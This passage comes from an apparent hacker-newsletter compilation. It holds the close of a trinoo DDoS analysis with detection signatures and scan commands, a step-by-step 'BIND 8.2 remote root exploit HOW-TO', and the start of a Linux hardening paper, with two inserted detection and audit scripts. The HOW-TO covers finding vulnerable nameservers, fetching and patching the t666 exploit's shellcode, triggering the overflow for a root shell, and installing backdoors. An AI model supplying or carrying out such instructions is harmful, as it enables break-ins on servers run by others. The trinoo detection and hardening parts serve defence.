assumed to be a list of potential targets for compromise and trinoo daemon/master installation. 
Rumors on Usenet newsgroups and Slashdot put the number of systems
controlled by this group in the 3000+ range.

----------------------------------------------------------------------------

Hello:

This is a notification that a system at your site apparently was used in a
large-scale UDP flood on a system at the University of Minnesota.

The hosts below have been involved in a series of escalating large-scale
denials-of-service that are flooding the University of Minnesota off the
internet. They are periodic, but expanding in the number of hosts used to
attack. We would like to hear about it if you can confirm whether your
system(s) were used. We're also *very* interested in any information about
this tool (since it appears to be new, and quite effective).

Thus far, all hosts used in this attack appear to have been Solaris 2.x
systems that were compromised using the recently-announced rpc.cmsd exploits
(see http://www.cert.org/advisories/CA-99-08-cmsd.html for details).

The following are lists of hosts apparently used, and the period of use.
We're certain about the timestamps--they're in CDT (-500)--but as with all
such floods, they ramp up and tail off. Since we're getting data in
ten-minute slices, the times are approximate.

The floods use unforged source IPs and consistent UDP source-ports. The
destination ports are random, aimed at 160.94.196.192. The packets are
32-byte UDP (and each flow represents many packets). I've included profile
information below, rather than log excerpts, because these run to many GB.
If you would like Cisco net-flow excerpts to demonstrate the behavior,
please reply to this message & ask.

All attacks have been launched at 160.94.196.192 (irc2.tc.umn.edu). And, as
I mentioned, all times are in CDT (-500) from an ntp-slaved log host (for
the ten-minute segments).

Thank you.

-susan

--
Susan B. Levy Haskell / sblh@nts.umn.edu / voice: (612) 626-8639
Security Incident Response Coordinator         fax: (612) 626-1002
Networking and Telecommunications Services, University of Minnesota
*** To report a security incident in progress, call (612) 625-0006 ***

=================================================

Appendix E - Further methods of detecting trinoo
------------------------------------------------

Authors: David Brumley
         David Dittrich
         George Weaver

Detecting Trinoo

Currently Trinoo has several signatures that allow it to be detected from IP
flow records.

Trinoo Daemon (ns.c) -

1. The trinoo daemon by default listens to UDP port 27444.

2. All communication with the trinoo daemon must have the string l44
   (ell 44).

3. The SYN flood mechanism picks the destination port via the following
   algorithm:

      to.syn_port = htons(rand() % 65534)

   Several observations can be made:

   a. randomize()/srandom() is never called, so the destination port will
      always fit the following algorithm:

         SYN packet 1 has destination port x
         SYN packet 2 has destination port y as defined by srandom(x); y = rand();
         SYN packet 3 has destination port z as defined by srandom(y); z = rand();

   b. Since the port is a result of modulus 65534, destination port 0 will
      show up, while destination port 65535 will not.

IDS detection of daemon:

1. Look for UDP connections to destination port 27444. This is indicative
   of the control session.

2. The string l44 will determine with a large probability that the packet
   is part of a trinoo control session.

3. Running trinoo DoS attacks (SYN Floods) can be identified by the
   algorithm given in 3 above. In addition, if you can catch the first SYN,
   it will *always* be the result of srand(1); rand();. On one author's
   laptop, an example sequence of destination ports would be:

      32540 48264 58208 56084 46021 37263 6890 38941 17766 40714

   Although this doesn't stop the Denial of Service, it will say with some
   probability this is a trinoo attack, and you should start looking for a
   master!
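The daemon and master signatures above, turned into detection logic as an added example (this is not code from the paper's authors): it labels flow records by the control ports 27444/27665/31335 and the l44 string, and checks a run of SYN destination ports against the unseeded rand() sequence. The rand() model is the reference LCG from the C standard and is an assumption; as the authors note, a real daemon host's sequence depends on its libc, so the model is a pluggable parameter. The flow records are constructed, modelled on the ngrep session earlier in this analysis.

```python
"""Spot trinoo control traffic and its unseeded SYN-flood port sequence.

Added example for the signatures described above; it is not code from the
paper's authors.  Flow records are constructed here, not a real capture.
"""
from dataclasses import dataclass

UDP, TCP = 17, 6
DAEMON_PORT = 27444        # master -> daemon commands, always carry "l44"
MASTER_PORT = 27665        # attacker -> master login (TCP)
DAEMON_REPLY_PORT = 31335  # daemon -> master replies ("PONG", "*HELLO*")


@dataclass(frozen=True)
class Flow:
    proto: int
    src: str
    sport: int
    dst: str
    dport: int
    payload: bytes = b""


def classify(flow):
    """Return why a flow looks like trinoo control traffic, or None."""
    if flow.proto == UDP and flow.dport == DAEMON_PORT and b"l44" in flow.payload:
        return "master->daemon command (UDP/27444 with 'l44')"
    if flow.proto == UDP and flow.dport == DAEMON_REPLY_PORT:
        return "daemon->master reply (UDP/31335)"
    if flow.proto == TCP and flow.dport == MASTER_PORT:
        return "login to master (TCP/27665)"
    return None


def scan(flows):
    """Flag flows that need follow-up, as (src, dst, reason) tuples."""
    hits = []
    for f in flows:
        reason = classify(f)
        if reason:
            hits.append((f.src, f.dst, reason))
    return hits


def ansi_c_rand_sequence(n, seed=1):
    """Stand-in rand() model: the reference LCG from the C standard (assumption).

    The real sequence depends on the daemon host's libc (the paper's caveat),
    so swap in the libc model for the hosts you are hunting on.
    """
    state, out = seed, []
    for _ in range(n):
        state = (state * 1103515245 + 12345) & 0xFFFFFFFF
        out.append((state >> 16) & 0x7FFF)
    return out


def looks_like_trinoo_syn_flood(dports, rand_sequence=ansi_c_rand_sequence):
    """True if the observed SYN destination ports equal rand() % 65534 from
    the default seed, i.e. the daemon never called srandom()."""
    if not dports or 65535 in dports:   # modulus 65534 can never yield 65535
        return False
    expected = [r % 65534 for r in rand_sequence(len(dports))]
    return list(dports) == expected


# Constructed sample, modelled on the control session in the ngrep capture.
SAMPLE_FLOWS = [
    Flow(TCP, "192.168.100.1", 1075, "10.0.0.1", 27665, b"betaalmostdone\r\n"),
    Flow(UDP, "10.0.0.1", 1025, "192.168.0.1", 27444, b"png l44adsl"),
    Flow(UDP, "192.168.0.1", 32894, "10.0.0.1", 31335, b"PONG"),
    Flow(UDP, "192.168.0.1", 1025, "10.0.0.2", 53, b"\x12\x34\x01\x00"),  # ordinary DNS
]

if __name__ == "__main__":
    for src, dst, reason in scan(SAMPLE_FLOWS):
        print(f"{src} -> {dst}: {reason}")
    flood = [r % 65534 for r in ansi_c_rand_sequence(10)]
    print("unseeded-rand flood detected:", looks_like_trinoo_syn_flood(flood))
```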
Detecting the trinoo daemon on your network:

1. Trinoo daemons can be indexed by a master by sending a png command. Live
   daemons will respond with a PONG. The original author probably added this
   so the master can see which daemons are still alive. You can scan a
   network with the attached program for anything that responds
   appropriately (which chances are is a trinoo daemon).

Trinoo Server (master.c) -

The network communications that are indicative of a trinoo server are:

1. Sending UDP packets with destination port 27444.
2. UDP packets as described above with the string l44adsl (ell 44 a d s
   ell).
3. A server will bind to port 27665.

IDS detecting the trinoo server:

1. Look for flows with protocol type 17 (UDP).
2. TCP connections (protocol type 6) to destination port 27665 (the trinoo
   server).

Detecting the Trinoo server on your network:

1. The server password hasn't changed (to the best of the authors'
   knowledge), nor has the port it listens to. Possible trinoo masters can
   be detected by using a tool like nmap to find hosts listening to port
   27665, i.e.

      nmap -PI -sT -p 27665 -m logfile "you.subnet.*.*"

   After a list of possible servers has been compiled, automated login can
   be used for positive identification. If you wish to script the automated
   login, try netcat (nc on most systems), i.e.

      echo "betaalmostdone" | nc 27665

NOTE: Your mileage may vary with the random number prediction since it's
very host specific - what does rand() really return? Consult your
documentation.

@HWA

308.0 [IND] Remote root exploit HOW-TO by E-mind
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

+-------------------------------------------------------+
|BIND 8.2 - 8.2.2 *Remote root Exploit How-To* by E-Mind|
+-------------------------------------------------------+

(A) What is a DNS?
    1. How do I query a DNS?
    2. How do I find a vulnerable DNS?
(B) How do I edit DNS entries?
    1. How do I find a Zone file?
    2. How do I edit a Zone file?
(C) How do I exploit a vulnerable machine
    1. What do I need to obtain before I could use the exploit?
    2. What is the theory behind the exploit?
    3. Where do I get the exploit from?
    4. Why should I patch the exploit?
    5. How do I patch the exploit?
    6. How do I compile the exploit?
    7. How do I run the exploit?
    8. How do I make the vulnerable server make a query to my ip?
    9. What should I do before I leave the shell?
(D) Who should be credited for this HowTo?
    1. Who is the person that motivated me into writing this?
    2. Who am I?
    3. Can I distribute/change this HowTo?
    4. Final Credits and Greets :)

Section A - What is a DNS?
--------------------------

A DNS (Domain Name Server) is used to convert host names to IP addresses and
IP addresses to host names. For example:

   www.infoseek.com = 204.162.96.173

1. How do I query a DNS?

First of all, you should probably know that when you configure your TCP/IP
and wish to use hostnames in your web browser to get to a web site, instead
of typing the IP address of that site, you would need to configure a DNS
server. You will get your DNS server IP address from your ISP.

To make queries to the DNS server, Unix systems (and NT) have a tool called
"nslookup". The syntax of that tool is:

   $nslookup or $nslookup

A properly configured DNS server contains two "lists" for a domain called
the Zone files. One zone file is used for hostname to IP resolution, and the
other is used for reverse lookup or IP to Hostname resolution.

"nslookup" can be used in an interactive way. This is the way we will work
with, as it is more powerful. Just type nslookup at the shell and press
enter. You will get a ">" prompt, from which you can start typing in IP
addresses and hostnames. There are some commands in nslookup which we will
discuss later in this howto that will allow you to get some more
information.

2. How do I find vulnerable systems?

Remember, we will exploit Name Servers. We first need to find out the
version of the DNS service that runs on a remote host.
As well, we will need to know the Operating System, but there are many
HowTo`s on that. We will use a tool called "dig", which is available on
most Unix systems. The syntax looks like this:

   $dig @ version.bind chaos txt | grep \"8

Look at the output. If you see 8.2 or 8.2.1 or 8.2.2 then it is vulnerable.
If you see 8.2.2P2 - P5, it is not. If you don't get an output and you just
see your terminal stuck, it means that the DNS admin has probably edited the
source so that the server won't give you this information. IT COULD BE
VULNERABLE.

Section B - How do I edit DNS entries?
--------------------------------------

The first thing you should know is, DNS is only text files, and entries are
added or changed by editing those text files and restarting the service.
The main file that controls the DNS service is /etc/named.conf or
/etc/named.boot. If /etc/named.conf exists, that is the file you should be
working with.

1. How do I find a Zone file?

As I said earlier, a properly configured DNS has two "lists" or zone files
for each domain it serves. You will need to edit that zone file to change or
add entries to that domain. A domain is, for example, infoseek.com, and a
hostname is www; the FQDN is www.infoseek.com. FQDN stands for Fully
Qualified Domain Name.

To find the zone file for FQDN to IP for the infoseek.com domain, we should
first query our DNS server to tell us what is the primary DNS for
infoseek.com. This is how it is done:

   $nslookup
   Default Server:  xxxxxx.xxxxxxx.xx.xx
   Address:  xxx.xx.xx.xx

   >set q=ns
   >infoseek.com
   >infoseek.com  nameserver = NS-UU.infoseek.com
   >NS-UU.infoseek.com  internet address = 198.5.208.3

As you can see, now we have the ip address of the name server of
infoseek.com. Let us suppose that we are root there. We SSH to their DNS,
and locate the file /etc/named.conf. We view the file and we see at the top
an options section. There is a line there that says:

   directory "/var/named"

This means that the zone files will sit in /var/named. We further look down
the file and we see some zone sections. We see a zone for infoseek.com which
looks like:

   zone "infoseek.com"{
           type master;
           file "infoseek.com.zone";
   };

As we can understand now, the zone file is /var/named/infoseek.com.zone,
and that is the file which we should edit.

2. How do I edit a Zone file?

First, let's take a look at that zone file. We see at the top a SOA record,
which probably looks to you like a block of garbage text at the top. Then,
we see something like:

   @          IN NS     NS-UU.infoseek.com.
   www        IN A      204.192.96.173
   ftp        IN CNAME  corp-bbn
   corp-bbn   IN A      204.192.96.2
   .
   .
   .

As we can see, there are several types of records. For our exploit to work,
we only need to focus on one record, which is NS. An A record is the typical
Hostname to IP record type. CNAME is a Canonical Name, which is an Alias to
an A record. A PTR record is a Pointer record, which is the opposite of A;
it points IP addresses to FQDN`s. PTR`s are used in the "other" zone file.
We will not discuss it here, but it is recommended that you read about DNS;
there are many good books about DNS out there, read one. An NS record is a
Name Server record type which says what is the Name Server for a specific
domain or sub-domain.

As you might have noticed, the NS record NS-UU.infoseek.com ends with a ".".
This is because we specified the FQDN and not the hostname. When the period
is omitted, the domain name is added after the hostname, and if we were to
omit the last period, it would be like we had said
NS-UU.infoseek.com.infoseek.com. So instead of:

   www IN A 204.192.96.173

we could write:

   www.infoseek.com. IN A 204.192.96.173

which is the same thing.

For our exploit to work, we will need to add a sub-domain to a name server
on the net. So let's again suppose that we are root at NS-UU.infoseek.com.
How do we add a sub-domain? We just need to add another NS record:

   subdomain IN NS hacker.box.com.
This means that the name server of the domain subdomain.infoseek.com would
be hacker.box.com. hacker.box.com needs to be resolved to your machine's IP
address, so enter your FQDN instead.

Now, we need to restart the name server so the changes will take effect.
Initiate the following command:

   #/usr/sbin/ndc restart
   new pid is 24654
   #

Section C - How do I exploit a vulnerable machine
-------------------------------------------------

1. What do I need to obtain before I could use the exploit?

First of all, 3 brain cells. ;p

You will also need root privileges on a PRIMARY Name Server on the Internet
which is Authoritative for a Domain on the net. Also, you will need a machine
from which you will run the exploit. As for the DNS requirement, you could
also ask someone that has root privileges on such a DNS to edit the zone
files for you.

2. What is the theory behind the exploit?

The exploit uses a Buffer Overflow in BIND versions 8.2 - 8.2.2 to gain a
remote root shell. The exploit binds to port 53 on the local machine, and
acts as a DNS server. When someone queries it, it will send a large NXT
record that contains code that will exploit the remote BIND server, provided
that it is a vulnerable machine.

To get more information on how Buffer Overflows work, *PLEASE* read Aleph
One`s excellent article: Phrack 49 Article 14 - Smashing The Stack For Fun
And Profit.
URL: http://www.phrack.com/search.phtml?view&article=p49-14

3. Where do I get the exploit from?

http://www.hack.co.za/daem0n/named/t666.c

4. Why should I patch the exploit?

You might have heard that one needs to patch the exploit to make it work.
This is because ADM thought only elite hax0rs should use their exploit and
so, they planted a small "bug" in the code. What they actually did is change
the shell codes so that instead of running /bin/sh, the exploit will run
/adm/sh.

5. How do I patch the exploit?

As you may see, only a small change needs to be done in the code.

   / = 2F(HEX)  ===>  / = 2F(HEX)
   a = 61(HEX)  ===>  b = 62(HEX)
   d = 64(HEX)  ===>  i = 69(HEX)
   m = 6D(HEX)  ===>  n = 6E(HEX)
   / = 2F(HEX)  ===>  / = 2F(HEX)

So, all we need to do is search the source code for
0x2f,0x61,0x64,0x6d,0x2f and replace it with 0x2f,0x62,0x69,0x6e,0x2f.
Done.

6. How do I compile the exploit?

As always:

   $gcc t666.c -o t666
   $

7. How do I run the exploit?

   $su
   Password:
   #./t666 1

Now the exploit is bound to port 53 (if you run a DNS server on the machine
you want to run the exploit on, you must first kill the name server, use:
#killall -9 named). The exploit is now waiting for queries; the second
someone queries your exploit machine you will get an output:

   Received request from xxx.xx.xx.xx:1025 for xxx.xxxxxxxxx.xx.xx type=1

If it was a DNS server, it would enter a proxy loop, and if it is a
vulnerable server, running on Linux Redhat 6.x - named 8.2/8.2.1 (from rpm)
(this is because we chose architecture 1; type ./t666 without arguments and
you will get a list of the architectures that the exploit will work on. I
have tried it on Redhat linux only, so don't ask me why solaris doesn't
work, I don't have a solaris to test it on, nor do I have the time to put
more effort on this exploit.) you will get a remote root shell.

8. How do I make the vulnerable server make a query to my ip?

This is very easy now. Once you have added a subdomain in a name server on
the net and made yourself its DNS, the only thing left to do is query the
vulnerable server for a host inside the added subdomain.

   $nslookup
   >server
   >www.subdomain.infoseek.com

What will happen is the server will ask, in this case NS-UU.infoseek.com,
for the IP of www.subdomain.infoseek.com. NS-UU.infoseek.com will start
searching and will get to subdomain; because subdomain has its OWN NS
record, it will tell that hacker.box.com. (your hostname in this case) is
the Authoritative Name Server for subdomain.infoseek.com.
Now, what will happen is that it will query hacker.box.com for the ip
address of www.subdomain.infoseek.com. BOOM! :)

9. What should I do before I leave the shell?

When you exploit BIND, it will crash named, so you need to add some kind of
a back door so you could log back in and restart it. *DO NOT TRY TO RESTART
IT WITHIN THE SHELL.* There are plenty of trojans and rootkits you could
install on the server, I leave that to you.

Section D - Who should be credited for this HowTo?
--------------------------------------------------

1. who is the person that motivated me into writing this?

That person is no other the gov-boi, he operates the great site
www.hack.co.za. Without him, this How-To would have never been writen!
Thanks Gov-Boi :)

2. whoami?

I am E-Mind, you can find me on IRC (EFNet) I am not giving away my E-Mail,
and will not answer stupied questions. I think I have provided everything
you need to RUN the exploit in this How-To. If not, and if you find errors,
PLEASE /msg me on IRC.

3. can I distribute/change this HowTo?

I take no responsibility for your actions. You are free to do whatever you
want with this file *AS LONG AS "SECTION D" REMAINS UNTOUCHED*

4. Final Credits and Greets :)

Credits:
Gov-Boi   - Keep up the good work man! ;p
Aleph One - no other article out there explains buffer overflows better
            then yours!
ADM       - for writing this cool exploit.

Greetz:
#myth!, #!glich, #972, #darknet, #feed-the-goats - `sup guyz? ;]

EOF

309.0 [IND] Paper: Armoring Linux by Lance Spitzner (July 28th 2000)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Preparing your linux box for the Internet

Armoring Linux

Lance Spitzner
http://www.enteract.com/~lspitz/papers.html
Last Modified: 25 June, 2000

Organizations throughout the world are adopting Linux as their production
platform. By connecting to the Internet to provide critical services, they
also become targets of opportunity.
To help protect these Linux systems, this article covers the basics of
securing a Linux box. The examples provided here are based on Red Hat 6.0,
but should apply to most Linux distributions.

Installation

The best place to start in armoring your system is at the beginning, OS
installation. Since this is a production system, you cannot trust any
previous installations. You want to start with a clean installation, where
you can guarantee the system integrity. Place your system in an isolated
network. At no time do you want to connect this box to an active network nor
the Internet, exposing the system to a possible compromise. I personally
witnessed a system hacked by a script kiddie within 15 minutes of connecting
to the Internet. To get critical files and patches later, you will need a
second box that acts as a go-between. This second box will download files
from the Internet, then connect to your isolated configuration "network" to
transfer critical files or burn the patches to a CDROM.

Once you have placed your future Linux box in an isolated network, you are
ready to begin. The first step is selecting what OS package to load. As of
RH 6.0, you have three options: Workstation, Server, and Custom (default). I
highly recommend Custom, as this allows you to choose what services are
added and how the system is partitioned. The idea is to load the minimum
packages, while maintaining maximum efficiency. The less software that
resides on the box, the fewer potential security exploits or holes. This
means if you do not need a News or Real Audio Server, don't install it. The
nice thing about Linux is, if you change your mind, it is easy to add
packages later. Regardless of which installation you choose, I would add the
manual pages and HOWTO docs. I find the on-line man pages and docs to be a
critical resource that add little risk to your system. If you selected
Custom, you will be asked to partition your system.
I always like to make root as big as possible and just throw everything in
there, then you do not run out of room in the future. However, we do need
several partitions to protect the root drive. If we were to fill the root
partition with data, such as logging or email, we would cause a denial of
service, potentially crashing the system. Therefore, I always recommend a
separate partition for /var; this is where all the system logging and email
goes. By isolating the /var partition, you protect your root partition from
overfilling. I've found 400 MB to be more than enough for /var (increase
this if your system will have a lot of mail). You may also consider making a
separate partition for specific application purposes, especially
applications that store extensive logging. If you are going to have users on
your system you do not trust, you may also want to create a separate /home
directory, so malicious users cannot fill the / partition. For a standalone
server, your partitions may look as follows:

   /     - everything else
   /var  - 400 MB
   swap  - (I normally go with 256 MB)

Once the system has rebooted after the installation, be sure to install the
recommended security patches. For Red Hat, you can find these security
patches at Red Hat's errata support site. Patches are critical to armoring a
system and should always be updated. bugtraq@securityfocus.com or
redhat-watch-list-request@redhat.com are excellent sources for following
bugs and system patches. Without these patches, your system can be easily
compromised. Be sure to use your go-between box to get the patches; the
Linux box should always remain on an isolated network. For Red Hat, once you
download the rpm, you can easily update your system using the following
syntax. An excellent example of this is the security update for wu-ftpd:

   rpm -Uvh wu-ftpd-2.6.0-14.6x.i386.rpm

For systems that are already on-line, you can ftp the rpm and install it at
the same time, using the following syntax:

   rpm -Uvh ftp://updates.redhat.com/6.1/i386/wu-ftpd-2.6.0-14.6x.i386.rpm

As of RH 6.1, there is a new utility for patches called 'up2date'. I highly
recommend you try this excellent utility. When run on a local system, it
determines which .rpm's need to be updated, gets those rpm's from Red Hat's
web site, and then downloads and installs the updated files. This tool is
highly customizable and easy to use.

Eliminating Services

Once you have loaded the installation package, patches, and rebooted, we are
now ready to armor the operating system. Armoring consists mainly of turning
off services, adding logging, tweaking several files, and configuring TCP
Wrappers. First we will begin with turning off services. By default, Linux
is a powerful operating system that executes many useful services. However,
most of these services are unneeded and pose a potential security risk.

The first place to start is /etc/inetd.conf. This file specifies which
services the /usr/sbin/inetd daemon will listen for. By default,
/etc/inetd.conf is configured for a variety of services; you most likely
only need two, ftp and telnet. You eliminate the remaining unnecessary
services by commenting them out (example A). This is critical, as many of
the services run by inetd pose serious security threats, such as popd,
imapd, and rsh. Confirm what you have commented out with the following
command (this will show you all the services that were left uncommented):

   grep -v "^#" /etc/inetd.conf

The next place to start are the .rc scripts; these scripts determine what
services are started by the init process. For Red Hat, you will find these
scripts in /etc/rc.d/rc3.d (or /etc/rc.d/rc5.d if you automatically boot to
a GUI, such as Gnome or KDE). To stop a script from starting, replace the
capital S with a small s. That way you can easily start the script again
just by replacing the small s with a capital S. Or, if you prefer, Red Hat
comes with a great utility for turning off these services.
Just type "/usr/sbin/setup" at the command prompt, and select "System
Services"; from there you can select what scripts are started during the
boot up process. Another option is chkconfig, which you will find on most
distributions. The following startup scripts may be installed by default but
are not critical to system functioning. If you don't need them, turn these
scripts off. The numbers in the names determine the sequence of
initialization; they may vary based on your distribution and version.
Scripts that start with a capital K instead of a capital S are used to kill
services that are already running.

   S05apmd       (You only need this for laptops)
   S10xntpd      (Network time protocol)
   S11portmap    (Required if you have any rpc services, such as NIS or NFS)
   S15sound      (Saves sound card settings)
   S15netfs      (This is the nfs client, used for mounting filesystems from
                  a nfs server)
   S20rstatd     (Try to avoid running any r services, they provide too much
                  information to remote users)
   S20rusersd
   S20rwhod
   S20rwalld
   S20bootparamd (Used for diskless clients, you probably don't need this
                  vulnerable service)
   S25squid      (Proxy server)
   S34yppasswdd  (Required if you are a NIS server, this is an extremely
                  vulnerable service)
   S35ypserv     (Required if you are a NIS server, this is an extremely
                  vulnerable service)
   S35dhcpd      (Starts dhcp server daemon)
   S40atd        (Used for the at service, similar to cron, but not required
                  by the system)
   S45pcmcia     (You only need this script for laptops)
   S50snmpd      (SNMP daemon, can give remote users detailed information
                  about your system)
   S55named      (DNS server. If you are setting up DNS, upgrade to the
                  latest version of BIND, http://www.isc.org/bind.html)
   S55routed     (RIP, don't run this unless you REALLY need it)
   S60lpd        (Printing services)
   S60mars-nwe   (Netware file and print server)
   S60nfs        (Used for NFS server, do not run unless you absolutely have
                  to)
   S72amd        (AutoMount daemon, used to mount remote file systems)
   S75gated      (Used to run other routing protocols, such as OSPF)
   S80sendmail   (You can still send email if you turn this script off, you
                  just will not be able to receive or relay)
   S85httpd      (Apache webserver, I recommend you upgrade to the latest
                  version, http://www.apache.org)
   S87ypbind     (Required if you are a NIS client)
   S90xfs        (X font server)
   S95innd       (News server)
   S99linuxconf  (Used to remotely configure Linux systems via browser,
                  every black-hat's dream :)

To see how many services are running before you change the startup scripts,
type:

   ps aux | wc -l

Once you are done with the installation and have turned off the startup
scripts, type the command again and compare how the number of services has
decreased. The fewer services running, the better. Also, confirm which are
left running by executing the following command:

   netstat -na --ip

Logging and Tweaking

Once you have eliminated as many services as possible, we want to enable
logging. All system logging occurs in /var/log. By default, Linux has
excellent logging, except for ftp. You have two options for logging for
ftp: configure the /etc/ftpaccess file or edit /etc/inetd.conf. I prefer to
edit /etc/inetd.conf, as it is simpler (i.e. harder to mess up :). Edit
/etc/inetd.conf as follows to ensure full logging of all FTP sessions.

   ftp   stream  tcp  nowait  root  /usr/sbin/tcpd  in.ftpd -l -L -i -o

--- From the man pages ---
If the -l option is specified, each ftp session is logged in the syslog.

If the -L flag is used, command logging will be on by default as soon as the
ftp server is invoked. This will cause the server to log all USER commands,
which if a user accidentally enters a password for that command instead of
the username, will cause passwords to be logged via syslog.

If the -i option is specified, files received by the ftpd(8) server will be
logged to the xferlog(5).

If the -o option is specified, files transmitted by the ftpd(8) server will
be logged to the xferlog(5).
--- snip snip ---

Next comes tweaking. This involves various file administration. The first
thing we want to do is secure our /etc/passwd file (this is the database
file that holds your user accounts and passwords). First, we want to ensure
our system is using /etc/shadow; this securely stores everyone's password as
hashes in a file only root can access. This protects your passwords from
being easily accessed and cracked (one of the first exploits a hacker looks
for). The use of shadow passwords is default as of RH 6.0, however it never
hurts to be sure. All you have to do is type the following command as root.
This automatically converts your passwords to the /etc/shadow file. Of all
the actions you can take to secure your system, I consider this to be one of
the most important.

   pwconv

The second step is to remove most of the default system accounts in
/etc/passwd. Linux provides these accounts for various system activities
which you may not need. If you do not need the accounts, remove them. The
more accounts you have, the easier it is to access your system. An example
is the "news" account. If you are not running nntp, a news group server, you
do not need the account (be sure to update /etc/cron.hourly, as this looks
for the user "news"). Also, make sure you remove the "ftp" account, as this
is the account used for anonymous ftp. From the man pages:

   man ftpd:
   Ftpd authenticates users according to four rules.
   4) If the user name is ``anonymous'' or ``ftp'', an anonymous ftp account
      must be present in the password file (user ``ftp''). In this case the
      user is allowed to log in by specifying any password (by convention
      this is given as the client host's name).

For an example of my /etc/passwd file, check out example C.

We also want to modify the file /etc/ftpusers (example D). Any account
listed in this file cannot ftp to the system.
This restricts common system accounts, such as root or bin, from attempting ftp sessions. Linux has the file by default. Ensure that root stays in this file; you never want root to be able to ftp to this system. Ensure that any accounts that need to ftp to the box are NOT in the file /etc/ftpusers.

Also, ensure that root cannot telnet to the system. This forces users to login to the system as themselves and then su to root. The file /etc/securetty lists what ttys root can connect to. List only tty1, tty2, etc. in this file; this restricts root logins to local access only. ttyp1, ttyp2, etc. are pseudo terminals; they allow root to telnet to the system remotely (example E).

Last, create the file /etc/issue. This file is an ASCII text banner that appears for all telnet logins (example B). This legal warning will appear whenever someone attempts to login to your system. If you want to continue using the same /etc/issue file, you will have to modify /etc/rc.d/init.d/S99local. By default, Linux creates a new /etc/issue file on every reboot.

Connecting to your server

For those of you who will be doing remote administration, it is critical that you develop a secured, controlled way to connect to the server. Often, you need remote access to your server for administration or the uploading of files; these communications need to be secured. I will discuss two options here, ssh and TCP Wrappers. I prefer ssh, as it encrypts all communication between you and the firewall. TCP Wrappers will NOT protect your network traffic from sniffing. Users can still capture all of your keystrokes (including passwords) on the network. If you are concerned about users capturing communications to your firewall, I recommend you replace telnet/ftp with ssh. ssh will encrypt all communications to your server, allowing you both to upload files and administer the server in a secure manner. ssh is similar to TCP wrappers in that it has its own layer of logging, and can limit what systems can connect to it.
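The account checks above (pwconv, leftover default accounts, root in /etc/ftpusers, only real ttys in /etc/securetty) are easy to verify mechanically. The following is an added example, not code from the article or its author: it audits constructed copies of the three files and reports what still needs fixing. The account/service table and the list of "safe" password-field markers are assumptions for the example.

```python
"""Audit the account-related hardening steps: shadowed passwords, leftover
default accounts, root in /etc/ftpusers, only local ttys in /etc/securetty.
Example code added for this article, not the author's; the sample file
contents are constructed."""

# Sample file contents, constructed for the example (not a real system).
PASSWD = """root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:
news:x:9:13:news:/var/spool/news:
ftp:x:14:50:FTP User:/home/ftp:
lance:x:500:500:Lance:/home/lance:/bin/bash
guest:abc123xyz:501:501:Guest:/home/guest:/bin/bash
"""
FTPUSERS = "bin\nnews\n"          # root is missing: a finding
SECURETTY = "tty1\ntty2\nttyp1\n"  # ttyp1 is a pseudo-terminal: a finding

# Default accounts the article says to remove when the matching service is not run
# (assumed table for the example).
UNNEEDED_ACCOUNTS = {"news": "nntp", "ftp": "anonymous ftp"}
# Password-field values that mean "no hash stored here" (assumed list).
SHADOWED_MARKERS = {"x", "*", "!", "!!"}


def parse_passwd(text):
    """Return one dict per well-formed /etc/passwd line."""
    fields = ("name", "passwd", "uid", "gid", "gecos", "home", "shell")
    entries = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        parts = line.split(":")
        if len(parts) != 7:
            continue
        entries.append(dict(zip(fields, parts)))
    return entries


def audit_passwd(text):
    findings = []
    for e in parse_passwd(text):
        # After pwconv every password field should be a marker; the hash lives in /etc/shadow.
        if e["passwd"] not in SHADOWED_MARKERS:
            findings.append(f"{e['name']}: password hash still in /etc/passwd (run pwconv)")
        if e["name"] in UNNEEDED_ACCOUNTS:
            findings.append(f"{e['name']}: remove unless you run {UNNEEDED_ACCOUNTS[e['name']]}")
    return findings


def audit_ftpusers(text):
    names = {l.strip() for l in text.splitlines() if l.strip()}
    return [] if "root" in names else ["root is missing from /etc/ftpusers"]


def audit_securetty(text):
    findings = []
    for tty in (l.strip() for l in text.splitlines()):
        if not tty:
            continue
        # ttyp*/pts entries are pseudo-terminals: they would allow remote root logins.
        if tty.startswith("ttyp") or tty.startswith("pts"):
            findings.append(f"{tty}: pseudo-terminal in /etc/securetty allows remote root login")
    return findings


def audit_all(passwd=PASSWD, ftpusers=FTPUSERS, securetty=SECURETTY):
    return audit_passwd(passwd) + audit_ftpusers(ftpusers) + audit_securetty(securetty)


if __name__ == "__main__":
    for finding in audit_all():
        print("WARN:", finding)
```

On a real box you would read the three files from /etc instead of the constructed strings; the logic is the same.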
For more information on ssh, you can find ssh here, including source for both ssh clients and the server daemon. I recommend you use ssh version 1.2.x, as version 2.x has a limiting license. Another ssh option is OpenSSH.

TCP Wrappers, while it does not encrypt, does log and control who can access your system. It is a binary that wraps itself around inetd services, such as telnet or ftp. With TCP Wrappers, the system launches the wrapper for inetd connections, logs all attempts and then verifies the attempt against an access control list. If the connection is permitted, TCP Wrappers hands the connection to the proper binary, such as telnet. If the connection is rejected by the access control list, then the connection is dropped. Fortunately for us Linux users, TCP Wrappers is already installed; the only thing left for us to do is edit the /etc/hosts.allow and /etc/hosts.deny files. These files determine who can and cannot access our systems. Also, TCP Wrappers allows us to do fancy things, such as banners or spawning additional programs, such as safe_finger. The syntax is relatively simple. Put the IP addresses or networks that you want to permit connections from in /etc/hosts.allow. Put the IP addresses or networks that you do not want to permit access in /etc/hosts.deny. By default, Linux allows connections from everyone, so you will need to modify these files. Two recommendations when working with TCP Wrappers:

  1. Use IP addresses instead of system or domain names.
  2. Set up /etc/hosts.deny to deny everything (ALL), then permit only specific sites with /etc/hosts.allow.

For examples on how to set up /etc/hosts.allow and /etc/hosts.deny, see example F. For more ideas on how to use TCP Wrappers, check out Intrusion Detection.

For the Truly Paranoid

I consider the measures discussed above absolutely essential. By following these steps, you have greatly improved your system's security, congratulations! Unfortunately, your system is not 100% secure, nor will it ever be.
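The security-relevant detail in the TCP Wrappers recommendations above is the evaluation order: hosts.allow is consulted first, then hosts.deny, and a client matching neither is let in, which is why "deny ALL, then allow specific sites" is the safe shape. The following is an added example, not the article's code and not part of TCP Wrappers; it re-implements that decision for a small subset of the hosts_access(5) pattern syntax (ALL, exact address, "net." prefix, net/mask) over constructed allow/deny files.

```python
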